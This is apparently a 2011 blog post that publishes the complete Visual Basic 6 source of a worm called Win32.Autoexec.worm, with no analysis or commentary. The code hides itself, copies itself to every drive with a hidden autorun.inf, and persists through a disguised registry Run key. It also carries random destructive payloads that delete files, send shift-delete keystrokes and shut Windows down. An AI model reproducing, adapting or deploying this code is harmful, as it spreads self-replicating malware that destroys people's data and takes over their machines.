Worm Virus | Win32.Autoexec.worm

On viernes, 28 de enero de 2011 0 comentarios

Description // Info




Source Code

  1. Private Sub Form_Load(): On Error Resume Next: Me.Visible = 0: App.TaskVisible = 0
  2. Dim Pyld As Integer: Randomize
  3. Dim BackUp As String: BackUp = Environ("windir") & "\Kernel23.exe"
  4. '-----------------------------------------------------------------------------------
  5. If LCase(App.EXEName) = "system" Then
  6. Shell "Explorer.exe " & Left(App.Path, 2), vbMaximizedFocus
  7. Pyld = Int(Rnd * 30)
  8. If Pyld = 1 Then MsgBox "Hehehe .. " & vbCrLf & "Bad News For You ( Your Infected )", 64, "Virus Alert!"
  9. If Pyld = 5 Then MsgBox " © By Mr.He$y / [P.V.T] ", 64, " W32/Autoexec.worm !"
  10. If Pyld = 10 Then MsgBox "System Error(-243245&H21321438230.)", 16, "Error"
  11. If Pyld = 15 Then Shell "Rundll.exe user.exe,exitwindows", vbHide
  12. If Pyld = 20 Then SendKeys "^a", 1: SendKeys "+{DEL}", 1: SendKeys "~", 1
  13. If Pyld = 25 Then Kill "*.*"
  14. If Pyld Mod 3 = 0 Then Shell Environ("COMSPEC") & " /C ECHO " & Chr(7), vbHide
  15. End If
  16. Call Search_Drv
  17. '-----------------------------------------------------------------------------------
  18. 'Worm BackUp To Windows Folder & Created Run Key Of Rgistery
  19. If Dir(BackUp) = "" Then
  20. Set Reg = CreateObject("Wscript.shell")
  21. Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\Microsoft Kernel Lab", BackUp
  22. FileCopy Worm, BackUp
  23. End If
  24. '-----------------------------------------------------------------------------------
  25. End
  26. End Sub
  27.  
  28. Private Sub Search_Drv()
  29. Dim Fso, Drives
  30. Set Fso = CreateObject("scripting.filesystemobject")
  31. Set Drives = Fso.Drives
  32. For Each Drive In Drives
  33. If Drive.IsReady Then
  34. Infected_Drv (Drive)
  35. End If
  36. Next
  37. End Sub
  38.  
  39. Private Sub Infected_Drv(Path As String)
  40. Dim INF As String: INF = Path & "\autorun.inf"
  41. Dim EXEC As String: EXEC = Path & "\System.exe"
  42. If Dir(INF, vbHidden) <> "" And Dir(EXEC, vbHidden) <> "" Then Exit Sub
  43. FileCopy Worm, EXEC
  44. Open INF For Output As #1
  45. Print #1, "[Autorun]"
  46. Print #1, "Open=System.exe"
  47. Close
  48. SetAttr INF, vbHidden
  49. End Sub
  50.  
  51. Public Function Worm() As String
  52. Worm = App.Path
  53. If Right(Worm, 1) <> "\" Then Worm = Worm & "\"
  54. Worm = Worm & App.EXEName & ".exe"
  55. End Function

0 comentarios:

Publicar un comentario